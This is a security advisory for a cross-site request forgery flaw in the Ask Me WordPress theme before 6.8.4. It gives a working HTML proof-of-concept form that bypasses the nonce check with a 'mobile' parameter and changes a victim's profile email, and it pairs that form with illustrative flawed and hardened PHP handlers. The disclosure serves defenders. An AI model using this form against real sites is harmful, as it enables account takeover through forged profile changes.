Ask Me < 6.8.4 - CSRF in Edit Profile

Description

The theme does not perform nonce checks when processing POST requests to the Edit Profile page, allowing an attacker to trick a logged-in user into changing their own profile information by getting them to submit a crafted request.

Version 6.8.2 introduced nonce checks, but they are bypassed when a non-empty 'mobile' parameter is sent along with the request.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/edit-profile/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nickname" value="Evil Ottar" />
      <input type="hidden" name="email" value="dr.evil@example.com" />
      <input type="hidden" name="user_action" value="edit_profile" />

      <!-- Version 6.8.2 introduces a nonce, but checking it is bypassed if 'mobile' is not empty. -->
      <input type="hidden" name="mobile" value="1" />

      <input type="submit" value="Save" />
    </form>
  </body>
</html>
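For comparison, the following is an added, hypothetical PHP handler that is not the theme's own code: it shows the kind of conditional nonce check the description implies (skipped when 'mobile' is non-empty) next to a hardened version that verifies the nonce unconditionally. The function names and the nonce action string 'askme_edit_profile' are assumptions.

```php
<?php
// Added illustrative example; not the Ask Me theme's real code.
// Hypothetical reconstruction of the flawed pattern, for contrast only.
function askme_edit_profile_flawed() {
    if ( ! is_user_logged_in() || ( $_POST['user_action'] ?? '' ) !== 'edit_profile' ) {
        return;
    }
    // Bug: a non-empty 'mobile' field short-circuits the condition, so the
    // nonce is never verified and a forged cross-site form is accepted.
    if ( empty( $_POST['mobile'] ) && ! wp_verify_nonce( $_POST['_wpnonce'] ?? '', 'askme_edit_profile' ) ) {
        wp_die( 'Invalid request', '', array( 'response' => 403 ) );
    }
    askme_apply_profile_update();
}

// Hardened pattern: the nonce is verified before any state change, with no
// request parameter able to bypass the check.
function askme_edit_profile_fixed() {
    if ( ! is_user_logged_in() || ( $_POST['user_action'] ?? '' ) !== 'edit_profile' ) {
        return;
    }
    $nonce = isset( $_POST['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'askme_edit_profile' ) ) {
        wp_die( 'Invalid request', '', array( 'response' => 403 ) );
    }
    askme_apply_profile_update();
}

// Shared update logic (hypothetical): only the current user's own record is touched.
function askme_apply_profile_update() {
    $data = array( 'ID' => get_current_user_id() );
    if ( ! empty( $_POST['nickname'] ) ) {
        $data['nickname'] = sanitize_text_field( wp_unslash( $_POST['nickname'] ) );
    }
    if ( ! empty( $_POST['email'] ) && is_email( wp_unslash( $_POST['email'] ) ) ) {
        $data['user_email'] = sanitize_email( wp_unslash( $_POST['email'] ) );
    }
    wp_update_user( $data );
}

// The legitimate form must emit the matching nonce; wp_nonce_field() adds
// the _wpnonce and _wp_http_referer hidden inputs for the given action.
function askme_render_nonce_field() {
    wp_nonce_field( 'askme_edit_profile' );
}
```

A form without the nonce field, such as the PoC above, fails the hardened check regardless of any other parameters it carries.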

Affects Themes

Fixed in 6.8.4

Classification

Miscellaneous

Original Researcher
WPScan team
Submitter
Harald Eilertsen
Verified
Yes

Timeline

Publicly Published
2022-08-01
Added
2022-08-01
Last Updated
2023-04-30